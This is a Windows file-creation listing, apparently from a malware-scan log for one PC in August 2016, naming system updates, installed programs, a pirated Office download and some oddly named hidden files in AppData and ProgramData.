2016-08-20 12:38 - 2016-08-21 14:40 - 00000000 ____D C:\Program Files\Common Files\Autodesk Shared
2016-08-20 12:22 - 2016-08-27 03:50 - 00004162 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{A6797E67-0C58-4F65-825F-15D401FB962D}
2016-08-20 12:16 - 2016-08-22 17:27 - 00005242 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for DESKTOP-A6RCKOD-Ryan DESKTOP-A6RCKOD
2016-08-20 02:17 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2016-08-20 02:17 - 2010-06-02 04:55 - 00518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2016-08-20 02:17 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2016-08-20 02:17 - 2010-06-02 04:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2016-08-20 02:17 - 2010-06-02 04:55 - 00077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2016-08-20 02:17 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2016-08-20 02:17 - 2010-05-26 11:41 - 02526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2016-08-20 02:17 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2016-08-20 02:17 - 2010-05-26 11:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2016-08-20 02:17 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2016-08-20 02:17 - 2006-03-31 12:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2016-08-20 02:17 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2016-08-20 02:17 - 2006-03-31 12:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2016-08-20 02:17 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2016-08-20 02:17 - 2006-03-31 12:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2016-08-20 02:17 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2016-08-20 02:17 - 2006-02-03 08:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2016-08-20 02:17 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2016-08-20 01:58 - 2016-08-20 01:58 - 00026192 ____N (Windows ® Server 2003 DDK provider) C:\Windows\gdrv.sys
2016-08-20 01:58 - 2016-08-20 01:58 - 00000010 _____ C:\Windows\GSetup.ini
2016-08-20 01:58 - 2009-08-27 03:04 - 00207400 ____R () C:\Windows\GSetup.exe
2016-08-20 01:54 - 2016-08-20 01:55 - 00000000 ____D C:\ProgramData\Package Cache
2016-08-19 23:30 - 2016-08-21 20:32 - 00000000 ____D C:\Users\Ryan\AppData\Local\Autodesk
2016-08-19 23:30 - 2016-08-21 14:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk
2016-08-19 23:30 - 2016-08-19 23:30 - 00000000 ____D C:\ProgramData\Applications
2016-08-19 23:27 - 2016-08-21 20:28 - 00000000 ____D C:\ProgramData\Autodesk
2016-08-19 23:27 - 2016-08-20 20:50 - 00000000 ____D C:\Users\Ryan\AppData\Roaming\Autodesk
2016-08-19 23:25 - 2016-08-21 15:42 - 00000000 ____D C:\Autodesk
2016-08-19 23:25 - 2016-08-19 23:25 - 00000000 ____D C:\Users\Ryan\AppData\Local\Akamai
2016-08-19 23:19 - 2016-08-26 22:34 - 00000000 ____D C:\Program Files\Microsoft Office
2016-08-19 23:19 - 2016-08-19 23:19 - 00000000 ____D C:\Users\Ryan\AppData\Local\Microsoft Help
2016-08-19 23:02 - 2016-08-19 23:12 - 00000000 ____D C:\Users\Ryan\Downloads\[]Microsoft Office Professional Plus (x64) 2013 Incl  Activator  P2P
2016-08-19 22:46 - 2016-08-19 22:46 - 00000000 ____D C:\Users\Ryan\AppData\Roaming\75a000
2016-08-19 22:46 - 2016-08-19 22:46 - 00000000 ____D C:\Users\Ryan\AppData\Local\751c12
2016-08-19 22:15 - 2016-08-27 04:08 - 00000920 ____H C:\ProgramData\@system.temp
2016-08-19 22:15 - 2016-08-19 22:15 - 00000008 ____H C:\ProgramData\@000001.dat
2016-08-19 22:14 - 2016-08-27 04:08 - 00000656 ____H C:\ProgramData\@system3.att
2016-08-19 22:14 - 2016-08-27 04:07 - 00000000 ____D C:\Users\Ryan\AppData\Roaming\BrowserMe
2016-08-19 22:14 - 2016-08-19 22:14 - 00000480 ____H C:\Users\Ryan\AppData\Roaming\½Ó
2016-08-19 21:59 - 2016-08-23 22:20 - 00000000 ____D C:\Users\Ryan\AppData\Local\AXworks
2016-08-19 21:58 - 2016-08-20 16:36 - 00003998 _____ C:\Users\Ryan\AppData\Roaming\HandfulTupik.BVV
2016-08-19 18:03 - 2016-08-19 18:03 - 00003748 _____ C:\Users\Ryan\AppData\Roaming\juncture.txn
2016-08-19 18:03 - 2016-08-19 18:03 - 00000250 _____ C:\Users\Ryan\AppData\Roaming\ecbolic.xnm
2016-08-19 17:05 - 2016-08-19 17:05 - 00000000 ____D C:\Users\Ryan\AppData\Roaming\Macromedia
2016-08-19 17:04 - 2016-08-19 17:04 - 00001989 _____ C:\Users\Public\Desktop\McAfee AntiVirus Plus.lnk
2016-08-19 17:04 - 2016-08-19 17:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-08-19 17:04 - 2016-02-24 21:07 - 00207968 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2016-08-19 17:03 - 2016-08-19 17:03 - 00003142 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-08-19 17:03 - 2016-08-19 17:03 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-08-19 17:03 - 2016-08-19 17:03 - 00000000 ____D C:\ProgramData\Intel Security
2016-08-19 17:03 - 2016-07-27 15:25 - 00504488 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-08-19 17:02 - 2016-08-25 20:51 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-08-19 17:02 - 2016-08-19 17:04 - 00000000 ____D C:\Program Files\McAfee
2016-08-19 17:02 - 2016-08-19 17:02 - 00000000 ____D C:\Program Files\McAfee.com
2016-08-19 17:02 - 2016-08-19 17:02 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-08-19 16:59 - 2016-04-26 17:56 - 00277744 _____ (McAfee, Inc.) C:\Windows\system32\mfevtps.exe
2016-08-19 16:47 - 2016-08-19 16:49 - 00000000 ____D C:\Users\Ryan\AppData\Local\Comms
2016-08-19 16:46 - 2016-08-20 18:40 - 00000000 ____D C:\ProgramData\McAfee
2016-08-19 16:46 - 2016-08-19 17:03 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-08-19 16:42 - 2016-08-20 16:37 - 00000000 ____D C:\Users\Ryan\AppData\Roaming\Apple Computer
2016-08-19 16:42 - 2016-08-19 16:42 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-08-19 16:42 - 2016-08-19 16:42 - 00001822 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Windows\System32\Tasks\Apple
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Users\Ryan\AppData\Local\Apple Computer
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Users\Ryan\AppData\Local\Apple
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\ProgramData\Apple Computer
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Program Files\iTunes
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Program Files\iPod
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Program Files\Bonjour
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Program Files (x86)\Bonjour
2016-08-19 16:42 - 2016-08-19 16:42 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-08-19 16:41 - 2016-08-19 16:42 - 00000000 ____D C:\ProgramData\Apple
2016-08-19 15:07 - 2016-08-19 15:07 - 00000000 ____D C:\Users\Ryan\AppData\LocalLow\Temp
2016-08-19 14:42 - 2016-08-19 15:07 - 00071587 ____T C:\Users\Ryan\Desktop\ParkingPermitReceipt.PDF
2016-08-19 06:49 - 2016-08-19 17:02 - 00000000 ____D C:\Program Files\Common Files\AV
2016-08-19 06:49 - 2016-08-19 16:54 - 00000000 ____D C:\Windows\System32\Tasks\Remediation
2016-08-18 23:24 - 2016-08-18 23:26 - 00000000 ____D C:\Windows\system32\MRT
2016-08-18 23:23 - 2016-08-18 23:23 - 147640136 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-08-18 23:21 - 2016-08-03 02:15 - 00468832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupEngine.dll
2016-08-18 23:21 - 2016-08-03 01:46 - 08016728 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-08-18 23:21 - 2016-08-03 01:44 - 02429792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-08-18 23:21 - 2016-08-03 01:44 - 02115936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-08-18 23:21 - 2016-08-03 01:39 - 00660320 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupEngine.dll
2016-08-18 23:21 - 2016-08-03 01:03 - 16708608 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2016-08-18 23:21 - 2016-08-03 00:57 - 24604160 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-08-18 23:21 - 2016-08-03 00:57 - 21862912 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-08-18 23:21 - 2016-08-03 00:53 - 13027328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2016-08-18 23:21 - 2016-08-03 00:52 - 02418688 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
2016-08-18 23:21 - 2016-08-03 00:46 - 02238464 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-08-18 23:21 - 2016-08-03 00:46 - 01123840 _____ (Microsoft Corporation) C:\Windows\system32\NaturalLanguage6.dll
2016-08-18 23:21 - 2016-08-03 00:40 - 01918976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
2016-08-18 23:21 - 2016-08-03 00:39 - 00846848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NaturalLanguage6.dll
2016-08-18 23:21 - 2016-08-03 00:38 - 03527168 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2016-08-18 23:21 - 2016-08-03 00:37 - 02558976 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2016-08-18 23:21 - 2016-08-03 00:36 - 07524352 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-08-18 23:21 - 2016-08-03 00:35 - 18799616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-08-18 23:21 - 2016-08-03 00:35 - 04791296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-08-18 23:21 - 2016-08-03 00:35 - 03584000 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-08-18 23:21 - 2016-08-03 00:35 - 01381376 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2016-08-18 23:21 - 2016-08-03 00:34 - 01522176 _____ (Microsoft Corporation) C:\Windows\system32\ActiveSyncProvider.dll
2016-08-18 23:21 - 2016-08-03 00:32 - 00939008 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.dll
2016-08-18 23:21 - 2016-08-03 00:32 - 00502784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-08-18 23:21 - 2016-08-03 00:30 - 02748416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2016-08-18 23:21 - 2016-08-03 00:28 - 03579392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-08-18 23:21 - 2016-08-03 00:27 - 01964544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2016-08-18 23:21 - 2016-08-03 00:26 - 05454848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-08-18 23:21 - 2016-08-03 00:22 - 00716288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsSpellCheckingFacility.dll
2016-08-18 23:21 - 2016-06-24 00:58 - 00442208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2016-08-18 23:21 - 2016-06-24 00:07 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupShim.dll
2016-08-18 23:21 - 2016-06-23 23:45 - 00282624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupShim.dll
2016-08-18 23:21 - 2016-05-28 01:00 - 00327520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2016-08-18 23:21 - 2016-05-28 00:00 - 01336832 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2016-08-18 23:21 - 2016-05-27 23:58 - 00672256 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-08-18 23:21 - 2016-05-27 23:58 - 00410624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-08-18 23:21 - 2016-05-27 23:58 - 00366592 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2016-08-18 23:21 - 2016-05-27 23:53 - 00332288 _____ (Microsoft Corporation) C:\Windows\system32\polstore.dll
2016-08-18 23:21 - 2016-05-27 23:44 - 00737792 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2016-08-18 23:21 - 2016-05-27 23:44 - 00045568 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-08-18 23:21 - 2016-05-27 23:43 - 00240128 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-08-18 23:21 - 2016-05-27 23:41 - 00272896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2016-08-18 23:21 - 2016-05-27 23:38 - 00291328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\polstore.dll
2016-08-18 23:21 - 2016-05-27 23:29 - 00502272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2016-08-18 23:21 - 2016-05-27 23:29 - 00037376 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-08-18 23:21 - 2016-04-09 06:52 - 00705520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-08-18 23:21 - 2016-04-09 06:06 - 01981280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-08-18 23:21 - 2016-04-09 06:05 - 01199368 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-08-18 23:21 - 2016-04-09 06:05 - 00331616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2016-08-18 23:21 - 2016-04-09 05:50 - 01515936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2016-08-18 23:21 - 2016-04-09 05:04 - 01780352 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2016-08-18 23:21 - 2016-04-09 04:09 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-08-18 23:21 - 2016-04-09 03:55 - 00373248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-08-18 23:21 - 2016-04-09 03:22 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bridge.sys
2016-08-18 23:21 - 2016-04-09 02:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-08-18 23:21 - 2016-03-16 00:37 - 01010016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2016-08-18 23:21 - 2016-03-15 23:47 - 00856576 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-08-18 23:21 - 2016-03-15 23:38 - 01423872 _____ (Microsoft Corporation) C:\Windows\system32\UserDataService.dll
2016-08-18 23:21 - 2016-03-15 23:37 - 00288256 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenance.dll
2016-08-18 23:21 - 2016-03-15 23:36 - 01205248 _____ (Microsoft Corporation) C:\Windows\system32\Unistore.dll
2016-08-18 23:21 - 2016-03-15 23:36 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\CallHistoryClient.dll
2016-08-18 23:21 - 2016-03-15 23:36 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\POSyncServices.dll
2016-08-18 23:21 - 2016-03-15 23:36 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\UserDataPlatformHelperUtil.dll
2016-08-18 23:21 - 2016-03-15 23:36 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTypeHelperUtil.dll
2016-08-18 23:21 - 2016-03-15 23:36 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\UserDataLanguageUtil.dll
2016-08-18 23:21 - 2016-03-15 23:31 - 00018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExtrasXmlParser.dll
2016-08-18 23:21 - 2016-03-15 23:27 - 00161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-08-18 23:21 - 2016-03-15 23:13 - 00928256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Unistore.dll
2016-08-18 23:21 - 2016-03-15 23:13 - 00131072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CallHistoryClient.dll
2016-08-18 23:21 - 2016-03-15 23:13 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\POSyncServices.dll
2016-08-18 23:21 - 2016-03-15 23:13 - 00055808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataPlatformHelperUtil.dll
2016-08-18 23:21 - 2016-03-15 23:13 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTypeHelperUtil.dll
2016-08-18 23:21 - 2016-02-23 10:51 - 00633184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys
2016-08-18 23:21 - 2016-02-23 10:43 - 00127840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2016-08-18 23:21 - 2016-02-23 10:11 - 00103776 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupApi.dll
2016-08-18 23:21 - 2016-02-23 08:50 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\NetCfgNotifyObjectHost.exe
2016-08-18 23:21 - 2016-02-23 08:42 - 00078176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupApi.dll
2016-08-18 23:21 - 2016-02-23 08:20 - 00138240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-08-18 23:21 - 2016-02-23 07:59 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-08-18 23:21 - 2016-02-23 07:37 - 00057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetCfgNotifyObjectHost.exe
2016-08-18 23:21 - 2016-01-31 01:34 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\ngckeyenum.dll
2016-08-18 23:21 - 2016-01-31 01:25 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-08-18 23:21 - 2016-01-31 01:23 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2016-08-18 23:21 - 2016-01-31 01:19 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbser.sys
2016-08-18 23:21 - 2016-01-31 01:11 - 00291840 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-08-18 23:21 - 2016-01-04 23:06 - 01063504 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-08-18 23:21 - 2016-01-04 23:06 - 00119800 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-08-18 23:21 - 2016-01-04 23:04 - 02824248 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2016-08-18 23:21 - 2016-01-04 22:30 - 00882208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-08-18 23:21 - 2016-01-04 22:30 - 00100712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-08-18 23:21 - 2016-01-04 22:28 - 02445128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2016-08-18 23:21 - 2016-01-04 22:09 - 01234944 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2016-08-18 23:21 - 2015-11-25 01:40 - 00516448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-08-18 23:21 - 2015-11-25 00:49 - 01569280 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Globalization.dll
2016-08-18 23:21 - 2015-11-25 00:30 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2016-08-18 23:21 - 2015-11-25 00:30 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hdaudbus.sys
2016-08-18 23:21 - 2015-11-25 00:18 - 01233920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Globalization.dll
2016-08-18 23:21 - 2015-11-05 01:14 - 00459104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2016-08-18 23:21 - 2015-11-05 00:56 - 00116064 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2016-08-18 23:21 - 2015-11-05 00:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-08-18 23:21 - 2015-09-25 00:01 - 00498016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-08-18 23:21 - 2015-09-24 23:07 - 01276416 _____ (Microsoft Corporation) C:\Windows\system32\wifinetworkmanager.dll
2016-08-18 23:21 - 2015-09-24 22:59 - 00590336 _____ (Microsoft Corporation) C:\Windows\system32\MessagingDataModel2.dll
2016-08-18 23:21 - 2015-09-24 22:32 - 00466432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MessagingDataModel2.dll
2016-08-18 23:21 - 2015-09-17 02:50 - 00099664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pdc.sys
2016-08-18 23:21 - 2015-09-17 02:37 - 01168736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-08-18 23:21 - 2015-09-17 02:06 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\CellularAPI.dll
2016-08-18 23:21 - 2015-09-17 02:03 - 00154624 _____ (Microsoft Corporation) C:\Windows\system32\dmcertinst.exe
2016-08-18 23:21 - 2015-09-17 02:02 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\mdmmigrator.dll
2016-08-18 23:21 - 2015-09-17 01:56 - 00521728 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2016-08-18 23:21 - 2015-09-17 01:56 - 00317440 _____ (Microsoft Corporation) C:\Windows\system32\configmanager2.dll
2016-08-18 23:21 - 2015-09-17 01:55 - 00202240 _____ (Microsoft Corporation) C:\Windows\system32\accountaccessor.dll
2016-08-18 23:21 - 2015-09-17 01:55 - 00121856 _____ (Microsoft Corporation) C:\Windows\system32\dmcsps.dll
2016-08-18 23:21 - 2015-09-17 01:50 - 00320000 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2016-08-18 23:21 - 2015-09-17 01:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\buttonconverter.sys
2016-08-18 23:21 - 2015-09-17 01:48 - 02093056 _____ (Microsoft Corporation) C:\Windows\system32\wlidsvc.dll
2016-08-18 23:21 - 2015-09-17 01:47 - 00513536 _____ (Microsoft Corporation) C:\Windows\system32\ngcsvc.dll
2016-08-18 23:21 - 2015-09-17 01:46 - 00621056 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2016-08-18 23:21 - 2015-09-17 01:46 - 00079872 _____ (Microsoft Corporation) C:\Windows\system32\HttpsDataSource.dll
2016-08-18 23:21 - 2015-09-17 01:46 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\syncmlhook.dll
2016-08-18 23:21 - 2015-09-17 01:44 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\bisrv.dll
2016-08-18 23:21 - 2015-09-17 01:44 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\syncutil.dll
2016-08-18 23:21 - 2015-09-17 01:43 - 00378368 _____ (Microsoft Corporation) C:\Windows\system32\SystemEventsBrokerServer.dll
2016-08-18 23:21 - 2015-08-18 03:55 - 00373072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2016-08-18 23:21 - 2015-08-11 05:09 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\wuautoappupdate.dll
2016-08-18 23:21 - 2015-08-11 04:59 - 01106432 _____ (Microsoft Corporation) C:\Windows\system32\sysmain.dll
2016-08-18 23:21 - 2015-08-11 04:59 - 00642560 _____ (Microsoft Corporation) C:\Windows\system32\rdbui.dll
2016-08-18 23:21 - 2015-08-05 23:17 - 00237392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdyboost.sys
2016-08-18 23:21 - 2015-08-05 22:22 - 00685568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdiWiFi.sys
2016-08-18 23:21 - 2015-08-04 00:07 - 00102752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-08-18 23:21 - 2015-08-02 22:18 - 00046432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msgpiowin32.sys
2016-08-18 23:21 - 2015-07-30 02:14 - 00333168 _____ (Microsoft Corporation) C:\Windows\system32\MFPlay.dll
2016-08-18 23:21 - 2015-07-30 00:24 - 00285632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFPlay.dll
2016-08-18 23:21 - 2015-07-29 23:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tunnel.sys
2016-08-18 23:21 - 2015-07-29 23:44 - 00280064 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2016-08-18 23:21 - 2015-07-29 23:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthhfenum.sys
2016-08-18 23:21 - 2015-07-22 01:15 - 00565088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2016-08-18 23:21 - 2015-07-22 00:00 - 00169984 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2016-08-18 23:21 - 2015-07-17 00:23 - 00934752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\refsv1.sys
2016-08-18 23:21 - 2015-07-17 00:07 - 00425824 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2016-08-18 23:21 - 2015-07-16 01:39 - 00061280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dam.sys
2016-08-18 23:21 - 2015-07-13 22:04 - 00046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\UcmUcsi.sys
2016-08-18 23:21 - 2015-07-10 21:03 - 03248128 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2016-08-18 23:21 - 2015-07-10 20:40 - 02606080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msftedit.dll
2016-08-18 23:20 - 2016-08-03 02:24 - 02152744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-08-18 23:20 - 2016-08-03 02:24 - 01356368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winmde.dll
2016-08-18 23:20 - 2016-08-03 02:24 - 00439648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncHost.exe
2016-08-18 23:20 - 2016-08-03 02:24 - 00046480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wldp.dll
2016-08-18 23:20 - 2016-08-03 02:14 - 00565648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2016-08-18 23:20 - 2016-08-03 02:13 - 00065096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Clipc.dll
2016-08-18 23:20 - 2016-08-03 02:09 - 00185952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll
